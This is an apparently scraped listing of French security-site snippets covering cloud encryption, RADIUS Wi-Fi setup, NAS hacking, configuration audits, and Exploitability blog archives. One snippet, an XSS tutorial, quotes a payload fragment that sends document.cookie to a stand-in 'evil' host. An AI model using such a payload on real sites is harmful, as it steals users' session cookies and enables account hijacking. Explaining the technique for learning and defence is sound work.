thebaud.com
Chiffrer vos données dans le Cloud avec CryptSync | Ressources sur la Sécurité des Systèmes d'Information
http://www.thebaud.com/chiffrer-vos-donnees-dans-le-cloud-avec-cryptsync
Ressources sur la Sécurité des Systèmes d'Information. Aller au contenu principal. Normes & Législations. Expertises Judiciaires & Privées. Chiffrer vos données dans le Cloud avec CryptSync. 8211; de l’hébergeur. 8211; d’un accès frauduleux à votre compte Cloud. Un outil aussi simple que puissant permet de répliquer ou sauvegarder ses données sur le Cloud avec un peu plus de sécurité : en les chiffrant. Ce soft est sous licence GNU GPL v2, disponible pour Windows Vista et supérieur . Puis déclarer une &l...
thebaud.com
Authentification | Ressources sur la Sécurité des Systèmes d'Information
http://www.thebaud.com/category/authentification
Ressources sur la Sécurité des Systèmes d'Information. Aller au contenu principal. Normes & Législations. Expertises Judiciaires & Privées. Archives pour la catégorie Authentification. Connexion WIFI WPA2 Entreprise sur un Active Directory 2012R2. Le contexte du tuto :. 1 serveur Windows 2012 R2 avec le rôle AD DS. 1 serveur Windows 2012 avec NPS. 1 portable sous Windows 7 Pro. 1 borne Wifi qui supporte l’authentification RADIUS (peu importe du 802.11 a, b, n ou ac…). Puis le service de rôles Serveur NPS.
natisbad.org
Debian and grsec kernel on NETGEAR ReadyNAS 102
http://www.natisbad.org/NAS2/index.html
Disclaimer: the information provided on this page is given as is, i.e. without warranty that you will not break your system following it. Additionally, do not expect to get support and warranty from NETGEAR if this happens. Debian and grsec kernel on NETGEAR ReadyNAS 102. Below to see current status and progresses. This is the same kind of work I previously performed for Netgear ReadyNAS Duo v2. The Duo v2 has 256MB of DDR3 RAM, the 102 comes with 512MB. 2 Hynix H5TQ2G83DFRH9C chips). The Duo v2 and the ...
natisbad.org
About / Contact
http://www.natisbad.org/about/index.html
Arno@natisbad.org PGP Key 0xA7AE341B. Well, all the public things I work or have worked on are available here. I don't twit, facebook or have a blog but you can find news about what I do on The Tally Ho! Développer sa bibliothèque de signature sur courbe". In Rennes, France. 5 minutes rump on ReadyNAS work. Slides in french. Eurisko : développement d'une carte électronique sécurisée. In Rennes, France. Also alvailable is the complete article. Pdf version, in french). ARMv7) work. Slides in french. Presen...
lestutosdenico.com
Nipper, audit de configuration | Les Tutos de Nico
http://www.lestutosdenico.com/outils/nipper-audit-de-configuration
Les Tutos de Nico. Parce que c'est trop fast0ch'. Nipper, audit de configuration. Tout d’abord désolé de ne pas avoir posté d’article depuis un bout de temps. Entre mon déménagement, le temps d’attente pour la récupération du net, le boulot, les conférences SSTIC. Et s’occuper de la petite, ca ne laisse pas beaucoup de temps. En tout cas, cela fait extrèmement du bien de retrouver le net! Surtout avec 17 mégas, ça le fait! Dans l’équipe pentest, je me suis dirigé chez Telindus. Tiens, en parlant de zenk.
exploitability.blogspot.com
Exploitability: septembre 2013
http://exploitability.blogspot.com/2013_09_01_archive.html
Jeudi 26 septembre 2013. XSS, onmouseover et un peu de javascript. Je donne un petit trick que j'aime beaucoup avec du javascript pour faire du XSS. Soit une page web avec un input type qui permet d'effectuer une recherche. Cet input est réaffiché sur la page de résultat. Cet input type est de la forme:. Input id="search id" type="text" value="valeur". Et ma requête devient plus intéressante, (je coupe en plusieurs lignes pour la lisibilité:. Http:/ evil/cookie='.concat(escape(document.cookie) ". Et java...
exploitability.blogspot.com
Exploitability: février 2013
http://exploitability.blogspot.com/2013_02_01_archive.html
Jeudi 28 février 2013. Des cookies bien chauds (et bien nombreux). J'ai remarqué depuis quelques temps plusieurs sites webs (US généralement) qui demandent lors de la première connexion à choisir la politique de confidentialité des cookies. Et en choisissant les paramétrages au plus bas d'un site web (le nom n'a pas d'intérêt pour la démonstration), ça a été le feu d'artifice:. On constate que je choisis bien uniquement les cookies obligatoires). 546 requêtes HTTP (! Vendredi 15 février 2013. J'ai lu réc...
exploitability.blogspot.com
Exploitability: mai 2013
http://exploitability.blogspot.com/2013_05_01_archive.html
Jeudi 30 mai 2013. La cible et les 4 cavaliers de l'AP(T)ocalypse - Partie 2/4. Du hack à l'APT - Partie 1/4. Introduction : les menaces aveugles et massives du passé. Ces menaces ont évoluées et sont devenues plus dangereuses. La cible et les 4 cavaliers de l'AP(T)ocalypse - Partie 2/4. 1/ Une cible visée. Ou bien une installation en prévision d'une attaque de sabotage ( Aramco a vu ainsi 30000 de ses postes windows wipés simultanément. 2/ La stratégie d'attaque: Les 4 cavaliers de l'AP(T)ocalypse.
exploitability.blogspot.com
Exploitability: avril 2013
http://exploitability.blogspot.com/2013_04_01_archive.html
Mardi 30 avril 2013. Conférences, Livre Blanc, et autre info. Quelques petites infos disparates réunies dans le même post de Blog:. J'ai le plaisir d'aller assister au Training Corelan D'HackInParis. Les 17-18-19 juin prochain. Par ailleurs, je retourne aux RMLL2013 en tant que speaker pour parler du chiffrement de disque sous linux dans une conférence intitulée "Myths and reality". 2/Le livre blanc et la fameuse menace "cyber". Le livre blanc de la défense et sécurité nationale. Un goût de stuxnet?
exploitability.blogspot.com
Exploitability: SSTIC 2014
http://exploitability.blogspot.com/2014/06/sstic-2014.html
Mardi 3 juin 2014. Tout droit sorti de l'imprimante. Inscription à : Publier les commentaires (Atom). A propos de l'auteur. Utilisation d'une puce TPM sous linux. Pour m'écrire: kevin2nis chez gmail point com. Ceci est un blog personnel, ce qui est exposé ici est donc le reflet des mes réflexions et positions personnelles et n'engagent donc que moi". Afficher mon profil complet. 2014 : Haka, un langage orienté réseaux et sécurité. 2013: Le chiffrement de disque sous linux, deuxième round.
SOCIAL ENGAGEMENT